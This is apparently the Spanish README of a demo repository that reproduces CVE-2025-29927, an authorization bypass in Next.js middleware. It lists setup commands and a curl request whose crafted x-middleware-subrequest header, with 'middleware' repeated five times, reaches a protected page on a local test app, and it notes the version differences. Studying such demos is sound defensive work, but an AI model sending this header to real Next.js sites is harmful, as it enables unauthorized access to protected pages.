
Demostración que reproduce la vulnerabilidad de omisión de autorización CVE-2025-29927 en Next.js.
Demo que reproduce la vulnerabilidad de bypass de autorización en Next.js.
Para más detalles sobre esta vulnerabilidad, consulte Resumen de la vulnerabilidad CVE-2025-29927 de Next.js .
git clone https://github.com/t3tra-dev/cve-2025-29927-demo.git
cd cve-2025-29927-demo
git pull origin main
npm install
npm run dev
x-middleware-subrequest usando curl u otra herramienta.curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/protected
Esto provoca un bypass de autorización y permite acceder a la página /protected.
El valor middleware es el nombre del middleware que Next.js reconoce. En esta aplicación demo, existe un middleware llamado middleware, por lo que al especificar este valor se produce el bypass de autorización.
[!TIP] En Next.js 15.x,
MAX_RECURSION_DEPTHestá configurado en 5, por lo que es necesario repetir el valor de middleware 5 o más veces separado por:. En versiones anteriores (14.x), simplemente 'middleware' era suficiente. Esta aplicación demo usa Next.js 15.2.2, por lo que se requiere este valor.